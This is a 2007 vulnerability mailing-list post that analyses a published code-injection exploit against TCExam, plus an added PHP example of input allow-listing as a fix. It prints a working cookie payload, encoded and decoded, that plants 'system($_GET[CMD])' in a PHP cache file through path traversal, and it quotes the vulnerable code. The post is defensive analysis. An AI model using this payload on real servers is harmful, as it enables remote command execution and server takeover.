[VIM] TCExam code injection: why does this work? (and vendor ACK)
Steven M. Christey
coley at mitre.org
Tue May 1 23:25:41 UTC 2007
Researcher: rgod
Ref: http://www.milw0rm.com/exploits/3816
This is a pretty complex manipulation. It concentrates on a
SessionUserLang cookie and provides an attack:
SessionUserLang=%2F..%2F%0Asystem%28%24_GET%5BCMD%5D%29%3B%3F%3E%23%2F..%2Fsuntzu;
which decodes to:
/../
system($_GET[CMD]);?>#/../suntzu;
This value is fed into $language in the constructor for the
TMXResourceBundle class (see $lang_resources assignment in rgod's
extract).
$cachefile is set as:
K_PATH_CACHE.basename(K_PATH_TMX_FILE, ".xml")."_".K_USER_LANG.".php")
and, since K_USER_LANG came from SessionUserLang, this would be set to
something like:
[K_PATH_CACHE][some-basename]_/../
system($_GET[CMD]);?>#/../suntzu;.php
If $cachefile is this value, then how does it possibly make it through
this code?
$this->cachefile = $cachefile;
if (file_exists($this->cachefile)) { // read data from cache
require_once($this->cachefile);
$this->resource = $tmx;
} else {
if (!empty($this->cachefile)) {
// open cache file
file_put_contents($this->cachefile, "<"."?php\n".
"// CACHE FILE FOR LANGUAGE: ".$language."\n".
"// DATE: ".date("Y-m-d H:i:s")."\n"
How could file_put_contents() possibly succeed with such a badly
formed filename?
Well - whatever it was, the vendor apparently fixed it:
http://sourceforge.net/forum/forum.php?forum_id=690912
"TCExam 4.1.000 new release with security fixes."
The tce_tmx code is now changed to say:
"// CACHE FILE FOR LANGUAGE: ".substr($language,0,2)."\n".
but I'm still confused about how $this->cachefile is opened in the
first place. What did I miss?
- Steve
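An added example, not TCExam's code and not the vendor's fix, showing the defensive pattern the report points at: a user-supplied language code is allow-listed before it is used either in the cache filename or inside generated PHP source, so neither a newline nor a `../` component can reach the cache path or break out of the `//` comment. Function names, the cache directory and the TMX filename are assumptions.

```php
<?php
// Added example (not TCExam code). The language code is validated once and the
// validated token is the only thing that ever reaches a path or generated source.

/**
 * Accept only a plain two-letter language code; anything else is rejected outright.
 * Hypothetical helper, not part of TCExam.
 */
function safe_language_code(string $value): string
{
    if (preg_match('/^[a-z]{2}$/', $value) !== 1) {
        throw new InvalidArgumentException('invalid language code');
    }
    return $value;
}

/**
 * Build the cache file path from the validated code. $cacheDir and $tmxFile are
 * assumed names standing in for the application's own constants.
 */
function cache_file_path(string $cacheDir, string $tmxFile, string $language): string
{
    $lang = safe_language_code($language);
    return rtrim($cacheDir, '/') . '/' . basename($tmxFile, '.xml') . '_' . $lang . '.php';
}

/**
 * Generate the cache source. The language appears only as the validated token and
 * the resource array is emitted with var_export() instead of string gluing, so the
 * file cannot contain more statements than the generator intended.
 */
function cache_file_source(string $language, array $tmx): string
{
    $lang = safe_language_code($language);
    return "<?php\n"
        . "// CACHE FILE FOR LANGUAGE: " . $lang . "\n"
        . "// DATE: " . date('Y-m-d H:i:s') . "\n"
        . '$tmx = ' . var_export($tmx, true) . ";\n";
}

// Constructed inputs: a legitimate code and a cookie-style value carrying a
// newline and traversal components (no command payload is needed to show the point).
$good = 'en';
$bad  = "/../\nnot-a-language/../x";
var_dump(cache_file_path('/var/cache/tcexam', 'tcexam_lang.xml', $good));
var_dump(substr_count(cache_file_source($good, ['hello' => 'Hello']), "\n")); // int(4)
try {
    cache_file_path('/var/cache/tcexam', 'tcexam_lang.xml', $bad);
} catch (InvalidArgumentException $e) {
    var_dump($e->getMessage()); // the raw cookie value never reaches the filesystem
}
```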